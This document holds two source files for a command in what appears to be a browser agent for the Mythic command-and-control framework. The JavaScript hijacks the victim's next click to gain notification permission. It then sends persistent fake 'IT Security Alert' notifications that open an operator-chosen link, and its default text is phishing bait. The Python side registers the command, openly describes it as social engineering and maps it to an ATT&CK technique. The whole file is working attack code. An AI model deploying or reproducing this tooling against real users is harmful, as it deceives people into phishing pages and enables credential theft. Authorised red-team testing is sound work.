File: Payload_Type/tyche/tyche/agent_code/notifications.js
COMMANDS['notifications'] = async function(task) {
    var params = parseParams(task);
    var title = (params && params.title) ? params.title : 'IT Security Alert';
    var body = (params && params.body) ? params.body : 'Unusual login detected on your account. Click to verify your identity.';
    var icon = (params && params.icon) ? params.icon : '';
    var url = (params && params.url) ? params.url : '';
    var count = (params && params.count) ? parseInt(params.count) : 1;

    if (!('Notification' in window)) {
        return JSON.stringify({error: 'Notification API not available'}, null, 2);
    }

    // Request permission — browsers require a user gesture for this call,
    // so if we don't have permission yet, wait for the next click.
    var perm = Notification.permission;
    if (perm === 'default') {
        perm = await new Promise(function(resolve) {
            var resolved = false;
            function handler() {
                if (resolved) return;
                resolved = true;
                document.removeEventListener('click', handler, true);
                Notification.requestPermission().then(resolve).catch(function() { resolve('denied'); });
            }
            document.addEventListener('click', handler, true);
            // Timeout after 30s — don't hang forever waiting for a click
            setTimeout(function() {
                if (!resolved) {
                    resolved = true;
                    document.removeEventListener('click', handler, true);
                    resolve('timeout');
                }
            }, 30000);
        });
    }

    if (perm === 'timeout') {
        return JSON.stringify({
            error: 'Notification permission requires a user click — timed out after 30s waiting for interaction',
            permission: 'default'
        }, null, 2);
    }

    if (perm !== 'granted') {
        return JSON.stringify({
            error: 'Notification permission denied',
            permission: perm
        }, null, 2);
    }

    var sent = 0;
    for (var i = 0; i < count; i++) {
        var opts = {body: body, requireInteraction: true};
        if (icon) opts.icon = icon;

        var n = new Notification(title, opts);
        if (url) {
            n.onclick = function() {
                window.open(url, '_blank');
            };
        }
        sent++;
        // Small delay between multiple notifications
        if (count > 1 && i < count - 1) {
            await new Promise(function(r) { setTimeout(r, 300); });
        }
    }

    return JSON.stringify({
        permission: perm,
        sent: sent,
        title: title,
        body: body,
        clickUrl: url || '(none)'
    }, null, 2);
};

File: Payload_Type/tyche/tyche/agent_code/notifications.py
from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *


class NotificationsArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="title",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                default_value="IT Security Alert",
                description="Notification title",
            ),
            CommandParameter(
                name="body",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                default_value="Unusual login detected on your account. Click to verify your identity.",
                description="Notification body text",
            ),
            CommandParameter(
                name="icon",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                default_value="",
                description="URL to notification icon image (optional)",
            ),
            CommandParameter(
                name="url",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                default_value="",
                description="URL to open when notification is clicked (optional)",
            ),
            CommandParameter(
                name="count",
                type=ParameterType.Number,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                default_value=1,
                description="Number of notifications to send",
            ),
        ]

    async def parse_arguments(self):
        if len(self.command_line) > 0:
            try:
                self.load_args_from_json_string(self.command_line)
            except:
                pass

    async def parse_dictionary(self, dictionary_arguments):
        self.load_args_from_dictionary(dictionary_arguments)


class NotificationsCommand(CommandBase):
    cmd = "notifications"
    needs_admin = False
    help_cmd = "notifications"
    description = "Send browser push notifications for social engineering. Customizable title, body, icon, and click URL. Will request permission if not already granted."
    version = 1
    author = "@grampae"
    attackmapping = ["T1204.001"]
    argument_class = NotificationsArguments
    attributes = CommandAttributes(
        supported_os=[SupportedOS.Browser]
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        title = task.args.get_arg("title") or "IT Security Alert"
        count = task.args.get_arg("count") or 1
        task.display_params = '"{}" x{}'.format(title, count)
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
        return resp
